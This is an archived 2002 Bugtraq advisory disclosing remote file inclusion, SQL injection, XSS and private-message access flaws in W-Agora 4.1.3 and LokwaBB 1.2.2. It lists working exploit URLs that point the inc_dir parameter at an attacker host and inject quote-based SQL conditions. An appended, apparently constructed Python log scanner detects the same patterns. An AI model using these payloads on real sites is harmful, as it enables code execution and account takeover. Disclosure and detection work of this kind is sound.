Security holes in LokwaBB and W-Agora

From: Frog Man (leseulfrogat_private)
Date: Sat Jun 08 2002 - 04:43:21 PDT

    Somebody advised me to post on bugtraq as well, not only on vuln-dev, so I am 
    doing it :)  I just hope that doesn't give more work to the webmasters.
    
    Product 1 :
    ***********
    W-Agora 4.1.3
    http://www.w-agora.net
    
    Problem :
    - File inclusion
    
    Exploits :
    - With a file http://www.attacker.com/dbaccess.txt :
    http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt
    http://[target]/include/postgres65.php?inc_dir=http://www.attacker.com&ext=txt
    http://[target]/include/mysql.php?inc_dir=http://www.attacker.com&ext=txt
    http://[target]/include/mssql7.php?inc_dir=http://www.attacker.com&ext=txt
    http://[target]/include/msql.php?inc_dir=http://www.attacker.com&ext=txt
    
    - With a file http://www.attacker.com/postgres65.txt :
    http://[target]/include/postgres.php?inc_dir=http://www.attacker.com&ext=txt
    
    - With the file http://www.attacker.com/auth.txt :
    http://[target]/user/agora_user.php?inc_dir=http://www.attacker.com&ext=txt
    http://[target]/user/ldap_example.php?inc_dir=http://www.attacker.com&ext=txt
    
    More details in French :
    http://www.ifrance.com/kitetoua/tuto/W-Agora.txt
    
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FW-Agora.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools
    
    Product 2 :
    ***********
    LokwaBB 1.2.2
    http://lokwa.farcom.com/
    
    Problems :
    - XSS
    - Private message reading
    - SQL Injection
    
    Exploits :
    - http://[target]/member.php?action=viewpro&member='%20OR%20password='PASSWORD
    - http://[target]/member.php?action=viewpro&member='%20OR%20status='Administrator
    - misc.php?action=forgot&send=yes&loser='%20OR%20password='PASSWORD
    - http://[target]/pm.php?action=reply&pmid=[MESSAGE ID]
    
    More details in French :
    http://www.ifrance.com/kitetoua/tuto/LokwaBB.txt
    
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FLokwaBB.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools
    
    
    
    Sorry for my poor English :)
    frog-m@n
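
A log check a defender could run for the request patterns listed in this advisory, as an added example that is not part of the original post or of either project's code. The parameter names (inc_dir, member, loser) come from the advisory; the log lines, hosts, finding labels and matching rules are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameter names taken from the advisory; the matching rules are assumptions.
INCLUDE_PARAMS = {"inc_dir"}        # W-Agora include-directory parameter
SQL_PARAMS = {"member", "loser"}    # LokwaBB parameters placed into SQL
# A value that starts with "scheme://" or "//" names a remote location.
REMOTE_SCHEME = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines in combined log format (documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jun/2002:05:01:11 -0700] "GET /include/mysql.php'
    '?inc_dir=http://attacker.example&ext=txt HTTP/1.0" 200 512',
    '192.0.2.10 - - [08/Jun/2002:05:02:40 -0700] "GET /member.php'
    '?action=viewpro&member=%27%20OR%20status=%27Administrator HTTP/1.0" 200 2048',
    '198.51.100.7 - - [08/Jun/2002:05:03:02 -0700] "GET /member.php'
    '?action=viewpro&member=alice HTTP/1.0" 200 2048',
    '198.51.100.7 - - [08/Jun/2002:05:03:09 -0700] "GET /index.php'
    '?inc_dir=include HTTP/1.0" 200 100',
]


def classify(log_line):
    """Return a sorted list of findings for one access log line."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    # parse_qs percent-decodes values, so %27 and %3A%2F%2F forms match too.
    params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    findings = set()
    for name, values in params.items():
        for value in values:
            if name in INCLUDE_PARAMS and REMOTE_SCHEME.match(value):
                findings.add("remote-include:" + name)
            if name in SQL_PARAMS and "'" in value:
                findings.add("sql-quote:" + name)
    return sorted(findings)


def scan(lines):
    """Return (line_number, findings) for every line with a finding."""
    hits = [(i, classify(line)) for i, line in enumerate(lines, start=1)]
    return [(i, found) for i, found in hits if found]


if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(number, ", ".join(found))
```

A hit only means the request carried the pattern; whether the include or query was reachable depends on the installed version and PHP configuration.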
    
    
    
    This archive was generated by hypermail 2b30 : Sat Jun 08 2002 - 10:37:52 PDT